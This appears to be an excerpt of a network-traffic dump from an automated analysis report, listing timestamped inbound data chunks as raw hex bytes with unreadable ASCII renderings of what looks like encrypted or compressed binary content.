                                                                                                                                                    2022-09-29 12:59:23 UTC33586INData Raw: b1 c1 65 68 c8 48 64 07 8d 83 fe 62 70 46 04 80 9f 1c 83 dd a0 f2 bf cf c6 9b 88 3c bc 0e a9 e1 82 db e9 11 4b 1d da 43 19 9c 50 f3 4c de 41 92 87 f9 5e 9d c2 ce 18 9e 97 e8 bd e8 87 c4 a6 65 67 e2 05 0f 6d d6 89 1c 87 52 19 a8 ff fc 0b 6d d4 ee 6c 14 b8 25 d7 22 65 ac 11 2b e1 49 ea 68 66 4d ea 6e 57 a1 9f e1 55 65 16 77 6b 7c 08 72 99 a9 d6 f6 c2 9c 9e fe 77 cd d9 a5 a4 b5 a6 82 1a da 68 8c 6f e0 91 61 42 87 85 fd c3 c2 d8 63 88 24 83 59 a5 49 e4 9e 85 85 bf c9 f5 72 c7 03 6c 71 90 42 4e 46 3a 71 e9 31 4c 4e 46 73 0b 36 28 4b 97 7c 6f b4 52 6c 9b 3e e2 cd a0 f9 93 d9 09 8a 99 57 03 44 e2 4c e7 d5 c1 5f a8 b2 50 c9 7b 97 70 3a 21 1c 93 26 85 8b 70 d2 24 3f 41 48 0b 43 9d 1b 74 6b 06 2c d3 f9 95 97 30 44 ee a6 34 98 ee 9f 9d 39 a3 44 59 1b ba 21 22 47 ba
                                                                                                                                                    Data Ascii: ehHdbpF<KCPLA^egmRml%"e+IhfMnWUewk|rwhoaBc$YIrlqBNF:q1LNFs6(K|oRl>WDL_P{p:!&p$?AHCtk,0D49DY!"G
                                                                                                                                                    2022-09-29 12:59:23 UTC33602INData Raw: b6 ab 82 73 1b 63 37 5b 7c 7f 35 ab 0f 0a ff 86 2a 4e 3a 16 b1 39 3a b0 36 34 0d 5b 59 fa 64 7f 86 f4 54 18 20 fc 10 9b de 1e f1 34 96 92 1f 68 83 02 de b5 fb 00 01 09 4f 48 02 88 88 ba 6b 4f 05 2f a5 d3 e6 59 e3 0e 4d 47 ed 26 d3 f1 d0 02 f4 1d 0c d2 42 98 61 9a 79 95 13 d2 cc d7 5a 3f 56 d6 6d bb a2 10 44 24 e4 9e a8 4b 5a b4 e2 4c 96 66 38 e1 04 bf 36 9f 9d c0 ce 0a 48 77 3a 85 ec 4f 25 a7 f1 ac 31 54 f9 1e 2b ac cc 92 32 41 b9 dc b9 fc cc f1 01 b8 33 53 c6 01 0b 18 1d 2d 89 b3 73 64 81 e1 7e 8e e0 90 ce 38 ab fb a2 2d e4 6a 65 fd 0e dc 91 ad 9c 4b 22 5a ca 0e 9f 89 e4 e3 53 ef 93 bb ea 92 35 29 e5 78 b9 4d a8 d3 ff 62 de 32 b9 35 9a 7c c3 a5 80 79 3d bd d1 73 3a 81 08 69 77 82 b1 3f 62 31 b3 85 3f f3 7a 40 ff b7 6e 88 e6 6a 76 30 60 1a 5a 66 1d bb 5b
                                                                                                                                                    Data Ascii: sc7[|5*N:9:64[YdT 4hOHkO/YMG&BayZ?VmD$KZLf86Hw:O%1T+2A3S-sd~8-jeK"ZS5)xMb25|y=s:iw?b1?z@njv0`Zf[
                                                                                                                                                    2022-09-29 12:59:23 UTC33618INData Raw: 7f ce a4 9a 8d b2 6b 9b 48 79 d1 f5 8b 08 c8 f7 b8 a2 c3 e2 5b cf c9 36 39 c5 ba 21 d9 14 69 e0 02 0c bc 9a 36 ff 8d 51 00 ff 74 61 bb 1a f0 f6 32 ba 2c bd 71 fa 68 1e 02 3d 1d fa b5 19 8c 1e 4e 05 8d f2 e3 4d 14 96 bb 2b e8 6a 47 a8 72 0d d5 39 f6 59 a1 cb da b5 9e 78 47 04 26 a1 32 dc e9 18 72 4f 1b 79 67 6a f0 1f cc f7 2e 47 2c a4 76 1c 69 58 5f aa 43 be 1e f9 8f d7 ab 71 1b e4 1b e3 b0 11 30 f5 73 7c b4 56 e3 1f 26 8b dd e5 ed fb 9e b0 dd 2a dc 09 53 b8 99 76 d1 3e 78 ff f1 a3 5f 1e 96 7d ab ba 74 62 3f 14 83 eb a1 cc 8d 45 f0 aa 0c 20 db c6 68 3d ca 5b 79 b0 20 1e 43 11 f9 b1 89 fd 8b d3 29 b4 f9 51 6f 17 9e b7 09 6b d8 87 f4 ce 2d ea b1 8d bb 0f 6f 30 a9 4c 89 5b 2d ac 8b 2c e5 5f cd d8 cb 56 6c 68 05 0a ac 78 85 cc 59 ea a4 5b ca 7a 63 dd e0 8c 10
                                                                                                                                                    Data Ascii: kHy[69!i6Qta2,qh=NM+jGr9YxG&2rOygj.G,viX_Cq0s|V&*Sv>x_}tb?E h=[y C)Qok-o0L[-,_VlhxY[zc
                                                                                                                                                    2022-09-29 12:59:23 UTC33634INData Raw: 2f a2 08 a8 33 80 38 3b f5 68 3f 47 75 cd 95 36 80 61 a5 a6 73 ff 52 66 85 0b 5a bd 1a f0 2d fd 4b c5 99 92 a2 29 f6 e2 d5 06 c1 b6 0f 94 40 c6 b0 d9 2d 1e 92 58 8f e6 70 4c 6f 5f 55 95 32 bc 0d e4 4c 2e ef df 33 f8 94 41 e5 29 f3 bf 95 e4 8e 2d fd 8a 70 b8 f1 8c 8f 51 fb 96 2b 29 e4 2e aa 68 51 04 54 35 8a 43 4a 1e ae 35 01 22 b8 5a e2 a3 98 e2 7b 11 55 47 ee b0 20 0d f9 38 1f 86 ea 18 b5 bb 6f 13 c7 97 71 c1 83 ae 91 54 a7 b9 d4 57 c4 ae 22 5a a6 f4 7b 84 f2 8d 5e 9f 9c 73 bf d1 6f cf 0f 27 68 d2 9a 48 fb a8 44 5e 55 39 61 9b bf a7 ce d5 83 93 95 c5 a3 c0 18 1e 21 f6 59 ab 43 08 9b 58 c0 98 f2 2e d4 09 64 86 9c 2c 1e fb 2d 8d bb 1c e5 5d 61 77 54 e7 2d 01 af f5 39 16 d8 4c dc de 9f 6a 7e b9 ab dd c2 ab 5e 18 c7 ad d7 be c5 58 69 4a 74 ab 4c 58 e4 b2 df
                                                                                                                                                    Data Ascii: /38;h?Gu6asRfZ-K)@-XpLo_U2L.3A)-pQ+).hQT5CJ5"Z{UG 8oqTW"Z{^so'hHD^U9a!YCX.d,-]awT-9Lj~^XiJtLX
                                                                                                                                                    2022-09-29 12:59:23 UTC33650INData Raw: 54 85 01 de ec a8 0a 13 e0 e1 35 d0 3f d5 da f7 01 19 16 47 11 4e 5a fa 27 08 4e 5e e4 ea 7a 61 d2 d6 ff cd 1d f4 de 4a 6f e8 61 5b 33 1c 14 88 a9 c1 2b 14 3a 56 ca 48 17 49 59 33 36 a5 48 df 30 00 45 69 d6 66 52 b6 31 fe cd 22 80 2b dc 26 d9 bc cf 36 b9 51 cb 82 ac 61 ec 8f 49 42 3f 3c 89 1c 46 64 86 73 c5 1d 5c a9 ff 64 26 75 d0 73 14 ec 73 bf d3 e1 a6 29 19 2b 8d 8f 66 12 70 9a ab 54 34 d1 e3 8b a8 a9 76 b4 73 37 cd ec 73 72 f0 6d 3e 67 95 03 89 00 9f 3e c7 5a 67 c7 84 73 87 4f 00 58 b9 62 4e 24 48 ad f2 37 bb db df 06 53 bf ae 11 83 53 ec 9d 69 a5 e2 dc 28 e0 9c a3 64 28 29 9f c0 92 10 b8 ab 56 50 d0 ec eb 1c c8 d5 cb f2 52 6f 57 ba e8 b8 d9 bf 4e d1 ff 75 31 83 86 ee 40 96 de 1b a0 2c 67 b3 3e 74 50 a4 d1 fd e7 9e a0 f2 c3 92 27 a4 59 27 3f 3f 12 13
                                                                                                                                                    Data Ascii: T5?GNZ'N^zaJoa[3+:VHIY36H0EifR1"+&6QaIB?<Fds\d&uss)+fpT4vs7srm>g>ZgsOXbN$H7SSi(d()VPRoWNu1@,g>tP'Y'??
                                                                                                                                                    2022-09-29 12:59:23 UTC33666INData Raw: ff 1d ee f6 57 a5 d4 ab 17 fe 7a 8d e8 40 32 2e 37 0b 0c 3e 72 f3 ef 58 3a 11 39 c5 24 27 3f 29 71 38 be da b0 7b 95 f7 b4 af b1 1e e0 6f b0 76 61 7c 83 8b 40 6d ee a3 ab 99 37 36 4d 56 76 02 87 1f 71 71 e1 4a 4f e5 fd 73 cf bc f2 7d 3f af 09 51 ac 30 40 f8 73 86 05 3c da 0d ab 16 9e 10 85 73 62 50 84 e8 7d 98 e8 a6 24 a6 d7 94 4e 2b 6c 43 1c 8e 26 94 ab a4 8c a8 25 99 7b 5f 34 7f 52 68 c7 b7 c9 ba 07 11 b0 de c6 b7 24 71 96 dd 1c 90 c9 ec 6c 2f 29 6f aa 8b 87 42 6c b2 d2 4c a3 04 4a ae f9 9b 73 f8 8d a1 b4 c0 c7 45 db 9e fc 9d 6b 30 49 ab f5 6d 52 bc 83 89 c9 70 b5 a7 61 95 08 b4 67 35 02 b1 79 2b 11 0a 8a 39 dc eb 07 dc c7 de ef 6e c6 89 45 d5 13 eb 7b 28 1d 66 05 52 aa 49 7d 63 c1 85 ef 7c 87 42 0c cb 3e 31 40 1c b2 6f b9 2d e1 8b 00 fa 6c b2 0d 68 6b
                                                                                                                                                    Data Ascii: Wz@2.7>rX:9$'?)q8{ova|@m76MVvqqJOs}?Q0@s<sbP}$N+lC&%{_4Rh$ql/)oBlLJsEk0ImRpag5y+9nE{(fRI}c|B>1@o-lhk
                                                                                                                                                    2022-09-29 12:59:23 UTC33682INData Raw: cd 01 cb b3 c6 39 e7 54 a0 21 84 04 c9 6e 17 38 10 93 ef 5b e1 9b c0 d8 4b 10 57 09 cb 7a 39 a8 61 6c 85 f5 03 11 99 4a 36 53 d1 b4 87 a1 f9 ef 16 e4 86 6a 6f e9 15 71 5b 6b 2b 1a 20 06 1e 82 f8 9f 3e c5 77 ce 54 78 9f 96 ee 60 b2 25 03 a6 69 2c 0a ec 9c b6 27 d0 fb 44 1b c6 de e7 0f 7e 2f 70 9f 8c 79 c3 4a 29 7c d1 c9 43 0a 1e 4f d1 3b 72 a7 5a e7 88 bd 84 62 ea 05 64 bb 0e 1d 7e 84 c6 4f 26 44 5b cb df 7e 3d 19 59 81 31 de 33 40 ba 3f 18 11 fe 6b 91 16 80 f5 92 ab f3 62 3e 58 89 f8 22 a4 1a 1f 2d 1a 21 c4 60 6e e7 da 03 cf e7 d4 17 b4 62 5c 95 8a e7 94 cb a4 cd 3c 18 a3 dc 57 a4 ab cd b7 ac 48 cc 53 45 5c e1 45 fc 69 14 24 9a 60 a5 6e 6a d0 2d 0b 1d 41 e2 d2 e6 15 28 22 f3 82 0b 1c 45 dd 04 72 b0 6f b4 ca 49 4b 31 d1 4a 0e de 98 87 da 18 db 2d 0f bb 5d
                                                                                                                                                    Data Ascii: 9T!n8[KWz9alJ6Sjoq[k+ >wTx`%i,'D~/pyJ)|CO;rZbd~O&D[~=Y13@?kb>X"-!`nb\<WHSE\Ei$`nj-A("EroIK1J-]
                                                                                                                                                    2022-09-29 12:59:23 UTC33698INData Raw: f4 3d 31 5b 27 75 1b 1b d6 c0 c7 63 29 01 4a 97 a5 17 af 46 9a d6 20 f7 11 28 03 af 6d e9 d7 e5 64 47 ac f2 c0 6e f7 d1 c8 69 7d 23 c6 59 0e a1 ba 32 63 d5 f6 bd 6a 47 3e b3 87 ea a6 23 ed 95 7a 5f 7f 7a 76 cc 94 2d 6d bd 26 1e 78 76 ad 36 f4 bf d6 7d da 87 67 e9 53 9b 6d 90 f1 db 6b b4 eb 99 b8 c8 de 0f 12 d0 7e f4 c7 8a f0 0e 28 74 24 99 d9 c5 0c 0f f6 4a c6 d9 87 7c 68 41 85 b7 08 ab ba 6c a2 40 ea ab d5 97 e8 5b c1 b6 d9 69 d9 e0 a9 d0 ce 01 a4 e6 16 90 1e 68 e8 b2 e2 9a 1e f3 22 fc b8 45 81 d3 84 4e 3d eb 24 32 8c 68 82 c4 c3 15 fc b4 a1 32 e0 45 9e eb 87 d7 b7 d4 0e eb cc cc 71 0b b2 e2 9a 21 4d 11 e9 19 35 5d f7 78 ca 49 54 5e 25 ff e8 d6 79 42 32 14 93 cb a7 83 9d 58 73 e4 66 1f ad 49 29 e5 0d bb 4e f1 55 2d 19 15 61 23 3f 57 75 53 0d 24 b6 21 43
                                                                                                                                                    Data Ascii: =1['uc)JF (mdGni}#Y2cjG>#z_zv-m&xv6}gSmk~(t$J|hAl@[ih"EN=$2h2Eq!M5]xIT^%yB2XsfI)NU-a#?WuS$!C
                                                                                                                                                    2022-09-29 12:59:23 UTC33714INData Raw: ce 3f fb 7b 43 28 57 bf 69 cf 3d 4a 55 99 cf a0 26 d1 f5 77 bc 4a ce 55 45 5d 27 fb 48 30 19 03 1d 49 08 86 18 39 01 da af 3a c7 d3 8b 19 86 92 a1 09 d2 df ba 8d 81 33 ab 80 8b e3 b0 06 21 98 73 af 8a 58 b5 3f 39 05 6d 46 5c 5a 4f 93 1c 5d 98 4f ef 93 c5 f9 d2 98 7e 8c 68 0a 17 1f 6b 3f a2 5b b2 b3 c8 98 6f f2 79 f4 ad 33 5f 02 61 33 4c b4 d5 40 63 15 d7 22 21 03 70 53 9a 2e 86 c8 e2 fd 87 79 1a 19 16 ff a2 11 fd 7c e6 d2 3d d1 f8 16 d7 6d 5a c8 8d b5 72 18 a1 b0 d5 0a 3e dd 57 e0 b6 ab f2 75 fb 19 55 1e 5d 95 2f f4 03 b7 10 16 c0 9d 61 11 ae 99 a4 a4 bf 9d f8 8e c7 46 bc 34 ad 82 20 47 9e 5d e7 97 69 d6 ee 9d 89 37 9d 3d d4 02 b0 08 c1 82 a5 21 55 a6 0f 93 d1 2c 0b 78 37 47 8b 43 c8 5e 56 13 40 fd cc c2 c0 44 93 37 9e 98 a9 57 69 e4 0a 1e 54 e9 e4 21 3c
                                                                                                                                                    Data Ascii: ?{C(Wi=JU&wJUE]'H0I9:3!sX?9mF\ZO]O~hk?[oy3_a3L@c"!pS.y|=mZr>WuU]/aF4 G]i7=!U,x7GC^V@D7WiT!<
                                                                                                                                                    2022-09-29 12:59:23 UTC33730INData Raw: 2f 1e f5 e7 37 e2 13 04 6d ac 28 93 15 1e 3a ad 52 59 dd 95 07 6a 5f df 66 1d 1c c0 06 4e 6d d0 0c 8e 65 d6 88 91 2c 84 8b 46 99 1e de af a6 c3 20 9f 81 f8 06 7a 1c b2 ba b6 43 c9 45 96 6a aa 77 16 1c cd ec 81 48 fd 89 a1 f4 20 5a 4d 79 7b 0d 1a 5c d6 c9 4e 35 57 7e f3 12 10 f4 ca ee 8f 99 62 93 02 27 ef 8c cb cc 56 56 62 35 be 28 4e 99 ce c0 ad fa ba 02 af 22 87 ad 24 ae a6 c2 7e 1b c7 ba 40 00 8e db ec 3a 5e d1 49 0d a8 66 ef ad e8 49 26 07 7d 98 7f fb e0 0a b3 ae 47 1f 1a 85 45 d1 a4 ed 84 03 81 e9 fa d8 df c5 e0 cf 11 a0 3b 1f c9 fe ae 29 68 29 6e 4a 0f 42 79 86 94 65 85 9c 57 f5 5e bc 60 56 09 19 14 4b 49 c1 76 b5 c3 49 a5 1c ca 6b 0f b7 4a bc ad 14 15 9b 60 e8 75 a4 77 e7 8d 83 16 5d 97 9b 51 d5 fe a7 a2 d5 df 24 87 c0 1e 3d 63 b9 a9 ef e7 e4 7d 25
                                                                                                                                                    Data Ascii: /7m(:RYj_fNme,F zCEjwH ZMy{\N5W~b'VVb5(N"$~@:^IfI&}GE;)h)nJByeW^`VKIvIkJ`uw]Q$=c}%
                                                                                                                                                    2022-09-29 12:59:23 UTC33746INData Raw: 0f bf 50 54 4f 89 dd ff 3d e0 99 dc 93 6f c4 1a 9f 1b e0 eb a2 8e 4a 92 0e 52 02 0f 48 56 da 18 57 40 ac 08 56 dc 97 98 4f 45 81 b4 80 0a 9d 01 b4 00 8b 61 74 6b 1b 71 e3 ad f7 ea 57 ec b8 1c 42 40 6d 93 13 5d 83 3f 70 83 78 d2 b4 90 28 64 dc c7 94 e8 3a da 96 3b 64 ca b3 e7 c3 89 40 98 62 41 5a 2d df 7d 7e 85 3a 47 26 37 d1 28 00 8f 3b 87 30 d7 49 bb 8a fd dd d5 4b eb 13 89 b2 d1 92 3c 3e e5 18 f6 89 70 af 96 62 3f d7 a0 f7 97 71 f7 b0 39 82 29 43 ef af 85 11 9f 07 18 76 9b d3 e1 02 b7 73 b4 59 65 35 2e e3 9c e3 13 e7 2b 04 77 fa c9 90 30 66 fb a1 58 41 61 f9 c3 6c c2 56 b5 72 58 5a 54 41 17 d1 4f e1 5b 90 e4 82 f0 38 0d c8 c0 93 8f 38 6b f6 f3 3c 36 78 60 22 18 b3 82 cf f6 70 92 43 c1 43 75 67 22 2a a0 a7 91 92 0a 57 0e f5 49 5b 9d 45 db 89 49 2b e9 e7
                                                                                                                                                    Data Ascii: PTO=oJRHVW@VOEatkqWB@m]?px(d:;d@bAZ-}~:G&7(;0IK<>pb?q9)CvsYe5.+w0fXAalVrXZTAO[88k<6x`"pCCug"*WI[EI+
                                                                                                                                                    2022-09-29 12:59:23 UTC33762INData Raw: 6f 80 64 20 bc a3 6b a6 9b b5 1c 45 2d a6 e4 1e a8 b1 b7 51 4a 2b 6c f4 8e 13 41 07 55 40 10 b5 5c 7f 49 b8 f2 62 2d 53 0b 00 0e d8 06 f8 92 e6 eb 06 5f 30 b0 72 ee 7f 9e bb 68 6c 77 d3 13 a4 da 13 7c 80 6c 69 45 2c 51 a1 f0 9a a7 9e 6b 8a 65 e0 3b 10 31 ad bb 39 07 c5 de 4b d7 dc 80 b0 29 dc 81 21 40 7a c8 f5 8f e0 0d 76 93 4a d2 96 7f 79 a7 84 2e 9e 7a e1 2a f8 29 5f 8d d4 bc 11 c8 ee 6d 85 96 4e 07 fd 9f 9e 98 d3 bd cb 75 46 d7 cc 8e 8a aa f1 99 9b b7 bb 0c 9d 2d 0a f3 d2 71 77 31 34 07 4f 1a fb e8 0d 38 61 9a c5 36 cb 19 3e 78 d8 31 4c 08 aa 07 18 5e 15 db bc 91 49 6c 7d e8 4c b1 67 0c 1b 60 13 fc 1c ad 66 1b c9 32 be ee 71 83 ab 9e 6a 1f 62 00 4e ea 2c 5b 6b 54 75 12 43 ce 04 5b b7 f6 52 2b b3 b8 40 f7 f8 7c 0a 9e 3d 28 2e be 0c e9 48 9f b6 1c 88 c8
                                                                                                                                                    Data Ascii: od kE-QJ+lAU@\Ib-S_0rhlw|liE,Qke;19K)!@zvJy.z*)_mNuF-qw14O8a6>x1L^Il}Lg`f2qjbN,[kTuC[R+@|=(.H
                                                                                                                                                    2022-09-29 12:59:23 UTC33778INData Raw: 78 98 76 47 5d 9e 54 e4 a3 d1 97 ba 96 c1 c9 9a 93 1f f3 15 fe 82 f7 10 59 b9 7a dc e6 1b df 9d d5 e8 22 c3 47 e0 0c 8e c5 ef 52 97 17 cb b0 8d d6 ad 49 0c 6d f9 b4 d3 c3 14 ea 84 2d 48 a3 18 7f 92 54 16 4b f2 3e 1c f5 ab fa 32 ed ae 51 08 d1 54 df 5e b4 5a 2e 36 aa 59 c4 6a 6c cf 9a 6a 47 df 6e 26 d7 21 2f fc c7 44 45 86 aa ed 3b 1b 31 61 8c b3 d3 fb 1e 50 52 40 18 38 c2 47 e8 e6 35 00 72 19 6f 58 d9 5b bf 6a c1 59 72 7d 11 3d 1a 5b 52 0a c5 91 c8 db 2c 0c 1e 23 d6 06 53 5d b8 42 40 5e 70 da 5b b7 12 29 ab 4e 84 4a 41 bb 07 b3 1d 79 27 1c 59 49 93 52 e5 68 76 85 cd a2 b2 60 06 d2 af 4a 65 f7 f4 63 6b 29 52 12 13 41 dc c8 54 61 01 24 9a ed 9e cd d4 cc ec c6 4d 59 18 6d 64 d1 43 c4 75 cc 67 cc 9a f7 b3 22 0c a6 2c ef eb 2f 10 2b 09 e9 8b 21 ec 42 10 de 7d
                                                                                                                                                    Data Ascii: xvG]TYz"GRIm-HTK>2QT^Z.6YjljGn&!/DE;1aPR@8G5roX[jYr}=[R,#S]B@^p[)NJAy'YIRhv`Jeck)RATa$MYmdCug",/+!B}
                                                                                                                                                    2022-09-29 12:59:23 UTC33782INData Raw: b5 26 99 52 76 fd 9c e7 fd 70 75 12 83 d2 df 31 78 70 28 1f 28 86 d6 d4 a1 a1 f4 f8 21 1a 6c a2 b4 26 81 8f c5 a0 63 9e 93 72 af a8 b6 1e 28 5e c8 de 49 57 56 6c 53 0c ad 97 27 80 ba e3 1e 5a e6 b5 97 6d 82 d8 16 d3 6a 67 bd 25 bd 69 33 e9 e3 df 0a dc 1d a8 d5 9b c9 53 4b 10 4d ad a8 be 4b 01 3c a4 8c d8 d5 c5 e3 e3 59 d6 12 32 06 74 f1 58 46 07 cb e3 ea 53 85 b4 83 99 2f c7 7b e0 36 50 05 17 aa 00 2e a3 c3 0c 67 b1 50 3b 50 ab 90 3c 46 01 fd 13 63 ab 6d 0e 39 0e 80 bc d5 9b 76 33 b6 55 f3 c7 ff 77 7d 06 09 a8 4d 33 36 f2 5f 67 ae ed b3 c9 d1 47 17 66 e5 be 8a 5a bf 51 22 68 be a3 01 6c 39 3c d8 77 5d 8a cf 37 da 6b 47 a6 3f 96 52 05 e0 ce b5 47 0a 9c 72 6e 20 f3 0a 98 54 34 24 9b 8d 4a 9e 6d 51 c6 a1 15 0f 92 95 41 84 d2 a0 4c 2a 5a 15 8e 8c 15 dd 7c 4b
                                                                                                                                                    Data Ascii: &Rvpu1xp((!l&cr(^IWVlS'Zmjg%i3SKMK<Y2tXFS/{6P.gP;P<Fcm9v3Uw}M36_gGfZQ"hl9<w]7kG?RGrn T4$JmQAL*Z|K
                                                                                                                                                    2022-09-29 12:59:23 UTC33798INData Raw: 0c 42 48 dd ea 18 eb b1 7c a6 3b 21 9e d2 7e 33 45 34 eb 07 a7 0e 4f 76 c6 64 af d5 4b b4 39 d4 2b f0 dd 5a 83 5b 6d 71 c9 bc 0b 1f 83 14 7b 1a c5 71 c5 6c a6 a6 a6 cb 64 b8 94 51 20 f2 6f 82 7a 79 4a 95 b5 4f ae c4 2c 3d d2 27 f1 5f ec 92 de 57 5f 3d de d0 a4 32 e2 70 c6 18 76 dc e2 78 54 04 a0 18 01 90 c4 90 fc 95 bc 58 bf 10 3c 17 42 02 c0 96 26 6b bf fa 02 20 7e c5 7f ae 3e 5c 75 96 b5 bf 1f dd f1 84 1d 7c e9 29 de 7d f3 0a be 54 6e 87 2b a4 62 19 9e 1b 34 44 d6 43 68 12 23 2b 4d 48 5e 4a dc a8 15 78 57 38 86 5a ab c5 59 a4 f5 66 89 d5 14 a5 ee a8 ff e8 15 83 89 aa 0b bb e6 04 04 9a b4 49 d6 6d 76 8a 04 78 c4 bc 0f 96 38 7e 2a 11 80 41 28 87 5b 0f 8e 26 fa 45 67 17 21 f3 04 d9 8f d1 08 88 07 2a 33 54 fc 5c 40 81 70 26 1c d5 9d 6c 12 71 79 95 52 17 22
                                                                                                                                                    Data Ascii: BH|;!~3E4OvdK9+Z[mq{qldQ ozyJO,='_W_=2pvxTX<B&k ~>\u|)}Tn+b4DCh#+MH^JxW8ZYfImvx8~*A([&Eg!*3T\@p&lqyR"
                                                                                                                                                    2022-09-29 12:59:23 UTC33814INData Raw: f0 b1 61 e1 ea aa 6e 78 32 ac c7 ea 96 3e 24 ef ee 70 13 26 0b 1f 6d 9a 89 6c 71 a3 3e da 96 6a 92 24 14 ea 3d 61 b8 2c 26 7c 32 2e 80 7e e7 61 99 99 95 1c 0e 86 7b 0a f8 d1 88 dc 42 6a 6c df 12 1b f9 1c c5 62 ea 87 5d 97 ae ca 1a 0f ab 37 93 64 28 76 8e 2e b6 1d 3d 3b a1 e9 64 a7 53 8d 50 34 cf 02 74 8e a4 4a e8 88 a1 70 d9 79 01 a1 dc 61 3a ce eb 6d 31 9f 62 cb 59 f5 ad 61 eb 48 e1 e6 6e 07 b2 5b 36 9b e8 de e8 5d ca 71 a5 32 68 97 ef b3 66 9f 40 44 f3 fa 5b 17 3f 96 5b 8a 54 a4 14 35 a0 1d 8c 5f ce 57 f2 99 0f c3 c1 3d bb 1e fc 86 a4 68 98 82 0d d3 7d a3 c7 6d b6 17 83 af d0 66 97 e6 b1 3c 10 a1 dd f0 fb 5f ac 54 ae 35 2e 6c 54 2b e3 0a 5c fe f2 ee 80 af 6b 03 49 ff b8 97 0e 1f 48 29 83 05 c5 ae 18 4e 08 ac f0 74 28 93 ff c2 bf 35 95 44 5f 78 40 c7 4f
                                                                                                                                                    Data Ascii: anx2>$p&mlq>j$=a,&|2.~a{Bjlb]7d(v.=;dSP4tJpya:m1bYaHn[6]q2hf@D[?[T5_W=h}mf<_T5.lT+\kIH)Nt(5D_x@O
                                                                                                                                                    2022-09-29 12:59:23 UTC33830INData Raw: 49 b3 35 a4 7b 60 ca df 56 31 70 82 a1 b3 1b 0a fa 25 27 da 43 c1 6b c9 95 8f d7 df d2 bd 50 88 e0 79 42 86 c8 1f 56 a2 83 c9 65 6a 7d ac 7c a0 57 d9 7c 0a 64 6d 0d 71 87 72 c4 55 23 82 a5 8c 29 b5 08 11 a4 26 f9 00 b0 f6 2e c0 87 75 66 7f 83 1b 0f 0c f3 a7 38 b5 53 02 91 a9 0e 0a 15 f3 7b 94 4b f9 f7 e0 97 28 86 40 4a 9d ff ad 40 d5 95 e1 cc 78 76 b0 e6 90 ff 0a 96 34 7a d8 1f 24 39 71 63 ac 10 70 0e b4 40 a5 0f ac 54 da c0 9d cc 3f 91 11 f5 f6 a2 e6 7b f0 56 4c be 77 5f 3d 43 f2 18 83 39 11 1e 34 73 6c 0a 46 94 1f 95 ff 4d 7f 42 5a 78 88 98 ef 31 3c bd d7 cb a4 48 d7 ee 2e 5e 21 ed 87 c2 20 aa 26 45 e1 ab cb 12 f8 9f 5c ca 7a 6d 57 bc f6 2f f2 62 af f4 11 1d a7 95 38 1d b7 19 64 1f ec bf eb a1 20 23 28 77 da 66 26 21 0d 7e dc 33 bb db 9b e2 e3 3c 4c 40
                                                                                                                                                    Data Ascii: I5{`V1p%'CkPyBVej}|W|dmqrU#)&.uf8S{K(@J@xv4z$9qcp@T?{VLw_=C94slFMBZx1<H.^! &E\zmW/b8d #(wf&!~3<L@
                                                                                                                                                    2022-09-29 12:59:23 UTC33846INData Raw: f5 4f 47 25 8c 84 d9 1f a1 15 1e dd 6a ac 48 2b 5d f8 21 31 32 5f 1e 1a 3c f7 47 99 cf 5c a6 81 bf f8 fb cf 43 e6 ae 1f 73 6b 51 64 db 1e 98 b5 b8 cf 30 92 e3 df c9 e3 12 4c 21 5b a8 b3 57 58 53 96 93 7a fe 9e 05 28 b1 25 b5 21 19 3d 85 64 37 8d 6f eb a1 69 8a 5f d5 a1 6e f1 85 26 e9 96 91 3e 25 1c 8b 39 0e 77 0c 9b b3 0b 07 ac 29 73 1c 6a 41 39 0c 68 85 65 47 4e b4 e7 99 c4 2e 56 f8 94 41 ca 55 21 21 da 0c 1c 86 9b 80 f4 6f 49 18 60 1a 32 27 71 de 9a 38 f6 6a 83 64 53 b9 49 c1 ce c7 dc ba da a2 ff f0 63 ee 9c cc 3b 10 95 ae 18 7f c0 04 71 75 29 46 8a b7 51 ce 4f 44 1c 4f fe 1f a0 29 c3 73 f0 8e be f2 ec 44 7e 54 da 28 04 7e 8c fe 84 47 9b 7a 2a bc 50 8c c4 f0 94 db b8 6d f6 ad c8 90 cc 67 7e cf de 34 31 0f 95 7b 6b ed e6 bb d3 64 42 b9 19 1f 08 97 5d 1e
                                                                                                                                                    Data Ascii: OG%jH+]!12_<G\CskQd0L![WXSz(%!=d7oi_n&>%9w)sjA9heGN.VAU!!oI`2'q8jdSIc;qu)FQODO)sD~T(~Gz*Pmg~41{kdB]
                                                                                                                                                    2022-09-29 12:59:23 UTC33862INData Raw: c6 0f 0b 10 70 73 0b df fc 01 74 07 9b b0 50 fb 7a 3e 5d cf 7e 69 55 67 25 73 1a fd 33 ab e0 47 88 e5 37 6d f9 6e 86 51 37 3a 04 0b f5 49 d8 a7 99 2d 06 df fd 93 33 48 15 9b f7 03 45 15 62 1e c4 99 44 f2 83 4a ba 0d b5 95 55 d9 01 ec 9c 5c 41 c1 38 15 f5 66 b4 66 99 17 b7 20 f0 d0 9a 45 1e a2 84 4a 91 69 0b 4c 45 a2 21 53 01 8e 36 1e cf 35 f1 cb 3d 41 91 b3 b2 21 35 1a ea ac 81 57 19 07 fe 40 ce 46 9e b4 87 b5 80 6e b2 87 88 50 6f 2d 17 a2 f4 ee a8 90 11 ac 41 0a c4 7d 8a 9c 3e ec b1 b9 fc 7a aa 7a 25 92 f1 9c 67 b1 3f ac f6 47 a3 82 31 17 50 d2 af 5f 3d 17 20 32 b2 cc ba ee f0 c8 85 2b a5 ed 43 ac e7 bc df 34 f1 4b 9f 36 27 38 4f 5c 2f 32 af ee bb 6b 08 9e 64 31 eb 3a c1 b4 77 cb 9a 18 29 84 5f 7b 7b c7 ec 6e 16 bb 25 6d d6 10 46 b3 33 8f 4c e4 2f df f9
                                                                                                                                                    Data Ascii: pstPz>]~iUg%s3G7mnQ7:I-3HEbDJU\A8ff EJiLE!S65=A!5W@FnPo-A}>zz%g?G1P_= 2+C4K6'8O\/2kd1:w)_{{n%mF3L/
